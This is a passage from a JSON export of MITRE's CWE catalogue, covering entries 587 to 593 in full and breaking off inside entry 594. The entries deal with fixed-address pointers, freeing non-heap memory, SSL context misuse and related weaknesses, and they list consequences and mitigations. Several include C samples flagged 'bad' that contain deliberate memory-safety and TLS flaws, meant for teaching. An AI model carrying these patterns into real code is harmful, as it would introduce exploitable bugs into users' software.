Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Explicit Call to Finalize","attr":{"@_Date":"2008-09-09"}}}},"587":{"attr":{"@_ID":"587","@_Name":"Assignment of a Fixed Address to a Pointer","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software sets a pointer to a specific address other than NULL or 0.","Extended_Description":"Using a fixed address is not portable, because that address will probably not be valid in all environments or platforms.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If one executes code at a known location, an attacker might be able to inject code there beforehand."},{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","Reduce Maintainability","Reduce Reliability"],"Note":"If the code is ported to another platform or environment, the pointer is likely to be invalid and cause a crash."},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Modify Memory"],"Note":"The data at a known pointer location can be easily read or influenced by an attacker."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Never set a pointer to a fixed address."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code assumes a particular function will always be found at a particular address. It assigns a pointer to that address and calls the function.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int (*pt2Function) (float, char, char)=0x08040000;int result2 = (*pt2Function) (12, \'a\', \'b\');","xhtml:br":["","",""],"xhtml:i":"// Here we can inject code to execute."}},"Body_Text":"The same function may not always be found at the same memory address. This could lead to a crash, or an attacker may alter the memory at the expected address, leading to arbitrary code execution."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT36-C","Entry_Name":"Converting a pointer to integer or integer to pointer","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Common_Consequences, Weakness_Ordinalities"}]}},"588":{"attr":{"@_ID":"588","@_Name":"Attempt to Access Child of a Non-structure Pointer","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Casting a non-structure type to a structure type and accessing a field can lead to memory access errors or data corruption.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"704","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Memory","Note":"Adjacent variables in memory may be corrupted by assignments performed on fields after the cast."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Execution may end due to a memory access error."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"Review of type casting operations can identify locations where incompatible types are cast."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"struct foo{}...int main(int argc, char **argv){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"int i;","attr":{"@_style":"margin-left:10px;"}},{"#text":"*foo = (struct foo *)main;foo-&gt;i = 2;return foo-&gt;i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer Use"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"}]}},"589":{"attr":{"@_ID":"589","@_Name":"Call to Non-ubiquitous API","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an API function that does not exist on all versions of the target platform. This could cause portability problems or inconsistencies that allow denial of service or other consequences.","Extended_Description":"Some functions that offer security features supported by the OS are not available on all versions of the OS in common use. Likewise, functions are often deprecated or made obsolete for security reasons and should not be used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"474","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Always test your code on any platform on which it is targeted to run on."},{"Phase":"Testing","Description":"Test your code on the newest and oldest platform on which it is targeted to run on."},{"Phase":"Testing","Description":"Develop a system to test for API functions that are not portable."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MET02-J","Entry_Name":"Do not use deprecated or obsolete classes or methods"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER00-J","Entry_Name":"Maintain serialization compatibility during class evolution"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"96"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Call to Limited API","attr":{"@_Date":"2008-04-11"}}}},"590":{"attr":{"@_ID":"590","@_Name":"Free of Memory not on the Heap","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application calls free() on a pointer to memory that was not allocated using associated heap allocation functions such as malloc(), calloc(), or realloc().","Extended_Description":"When free() is called on an invalid pointer, the program\'s memory management data structures may become corrupted. This corruption can cause the program to crash or, in some circumstances, an attacker may be able to cause free() to operate on controllable memory locations to modify critical program variables or execute code.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"762","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Modify Memory"],"Note":"There is the potential for arbitrary code execution with privileges of the vulnerable program via a \\"write, what where\\" primitive. If pointers to memory which hold user information are freed, a malicious user will be able to write 4 bytes anywhere in memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Only free pointers that you have called malloc on previously. This is the recommended solution. Keep track of which pointers point at the beginning of valid chunks and free them only once."},{"Phase":"Implementation","Description":"Before freeing a pointer, the programmer should make sure that the pointer was previously allocated on the heap and that the memory belongs to the programmer. Freeing an unallocated pointer will cause undefined behavior in the program."},{"attr":{"@_Mitigation_ID":"MIT-4.6"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, glibc in Linux provides protection against free of invalid pointers."]}},{"Phase":"Architecture and Design","Description":"Use a language that provides abstractions for memory allocation and deallocation."},{"Phase":"Testing","Description":"Use a tool that dynamically detects memory management problems, such as valgrind."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, an array of record_t structs, bar, is allocated automatically on the stack as a local variable and the programmer attempts to call free() on the array. The consequences will vary based on the implementation of free(), but it will not succeed in deallocating the memory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"record_t bar[MAX_SIZE];...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"record_t bar[MAX_SIZE]; //Global varvoid foo(){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...free(bar);","xhtml:br":["","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"void foo(){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"record_t *bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t));...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"record_t *bar; //Global varvoid foo(){}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bar = (record_t*)malloc(MAX_SIZE*sizeof(record_t));...free(bar);","xhtml:br":["","","","",""],"xhtml:i":"/* do something interesting with bar */"}}}}],"Body_Text":["This example shows the array allocated globally, as part of the data segment of memory and the programmer attempts to call free() on the array.","Instead, if the programmer wanted to dynamically manage the memory, malloc() or calloc() should have been used.","Additionally, you can pass global variables to free() when they are pointers to dynamically allocated memory."]}},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM34-C","Entry_Name":"Only free memory allocated dynamically","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"WIN30-C","Entry_Name":"Properly pair allocation and deallocation functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-480"}}},"Notes":{"Note":{"#text":"In C++, if the new operator was used to allocate the memory, it may be allocated with the malloc(), calloc() or realloc() family of functions in the implementation. Someone aware of this behavior might choose to map this problem to CWE-590 or to its parent, CWE-762, depending on their perspective.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Other_Notes"}],"Previous_Entry_Name":[{"#text":"Improperly Freeing Heap Memory","attr":{"@_Date":"2008-04-11"}},{"#text":"Free of Invalid Pointer Not on the Heap","attr":{"@_Date":"2009-05-27"}},{"#text":"Free of Memory not on the Heap","attr":{"@_Date":"2009-10-29"}}]}},"591":{"attr":{"@_ID":"591","@_Name":"Sensitive Data Storage in Improperly Locked Memory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application stores sensitive data in memory that is not locked, or that has been incorrectly locked, which might cause the memory to be written to swap files on disk by the virtual memory manager. This can make the data more accessible to external actors.","Extended_Description":"On Windows systems the VirtualLock function can lock a page of memory to ensure that it will remain present in memory and not be swapped to disk. However, on older versions of Windows, such as 95, 98, or Me, the VirtualLock() function is only a stub and provides no protection. On POSIX systems the mlock() call ensures that a page will stay resident in memory but does not guarantee that the page will not appear in the swap. Therefore, it is unsuitable for use as a protection mechanism for sensitive data. Some platforms, in particular Linux, do make the guarantee that the page will not be swapped, but this is non-standard and is not portable. Calls to mlock() also require supervisor privilege. Return values for both of these calls must be checked to ensure that the lock operation was actually successful.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"413","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Memory"],"Note":"Sensitive data that is written to a swap file may be exposed."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Identify data that needs to be protected from swapping and choose platform-appropriate protection mechanisms."},{"Phase":"Implementation","Description":"Check return values to ensure locking operations are successful."}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM06-C","Entry_Name":"Ensure that sensitive data is not written out to disk"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Memory Locking","attr":{"@_Date":"2008-04-11"}}}},"592":{"attr":{"@_ID":"592","@_Name":"DEPRECATED: Authentication Bypass Issues","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated because it covered redundant concepts already described in CWE-287.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Common_Consequences, Description, Name, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"Authentication Bypass Issues","attr":{"@_Date":"2017-05-03"}}}},"593":{"attr":{"@_ID":"593","@_Name":"Authentication Bypass: OpenSSL CTX Object Modified after SSL Objects are Created","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software modifies the SSL context after connection creation has begun.","Extended_Description":"If the program modifies the SSL_CTX object after creating SSL objects from it, there is the possibility that older SSL objects created from the original context could all be affected by that change.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"No authentication takes place in this process, bypassing an assumed protection of encryption."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The encrypted communication between a user and a trusted host may be subject to a sniffing attack."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a language or a library that provides a cryptography framework at a higher level of abstraction."},{"Phase":"Implementation","Description":"Most SSL_CTX functions have SSL counterparts that act on SSL-type objects."},{"Phase":"Implementation","Description":"Applications should set up an SSL_CTX completely, before creating SSL objects from it."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define CERT \\"secret.pem\\"#define CERT2 \\"secret2.pem\\"int main(){}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"SSL_CTX *ctx;SSL *ssl;init_OpenSSL();seed_prng();ctx = SSL_CTX_new(SSLv23_method());if (SSL_CTX_use_certificate_chain_file(ctx, CERT) != 1)if (SSL_CTX_use_PrivateKey_file(ctx, CERT, SSL_FILETYPE_PEM) != 1)if (!(ssl = SSL_new(ctx)))if ( SSL_CTX_set_default_passwd_cb(ctx, \\"new default password\\" != 1))if (!(ssl2 = SSL_new(ctx)))","xhtml:br":["","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"int_error(\\"Error loading certificate from file\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error loading private key from file\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error creating an SSL context\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Doing something which is dangerous to do anyways\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"int_error(\\"Error creating an SSL context\\");","attr":{"@_style":"margin-left:10px;"}}]}}}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"94"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Common_Consequences, Relationships"}]}},"594":{"attr":{"@_ID":"594","@_Name":"J2EE Framework: Saving Unserializable Objects to Disk","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When the J2EE container attempts to write unserializable objects to disk there is no guarantee that the process will complete successfully.","Extended_Description":"In heavy load conditions, most J2EE application frameworks flush objects to disk to manage memory requirements of incoming requests. For example, session scoped objects, and even application scoped objects, are written to disk when required. While these application frameworks do the real work of writing objects to disk, they do not enforce that those objects be serializable, 